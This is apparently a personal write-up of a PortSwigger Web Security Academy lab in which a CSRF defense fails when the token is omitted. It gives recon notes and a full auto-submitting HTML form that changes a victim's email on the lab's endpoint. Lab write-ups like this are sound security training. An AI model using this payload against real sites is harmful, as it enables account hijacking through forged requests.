# Lab: CSRF where token validation depends on token being present ###### tags: `Portswigger Web Security Academy` `Web` * Description: This lab's email change functionality is vulnerable to CSRF. * Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address. You can log in to your own account using the following credentials: `wiener:peter` ## Recon 1. Login and update email to trace the package It's very similar with previous lab $\to$ it contained `CSRF_token` as its carried data:  2. Try to use 1st method to bypass  It seems can work properly. ## Exp - Delete `CSRF_token` directly to bypass Actually, this is totally the same with the first lab's payload Exploit Payload: ```javascript= <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://0aa70059042bf55d80101c7a00930051.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="danger&#64;gmail&#46;com" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` :::spoiler Success Screenshot  ::: ## Reference [Lab: CSRF where token validation depends on token being present:CSRF](https://blog.csdn.net/ZripenYe/article/details/120793710) [从0到1完全掌握 CSRF](https://zhuanlan.zhihu.com/p/517735618)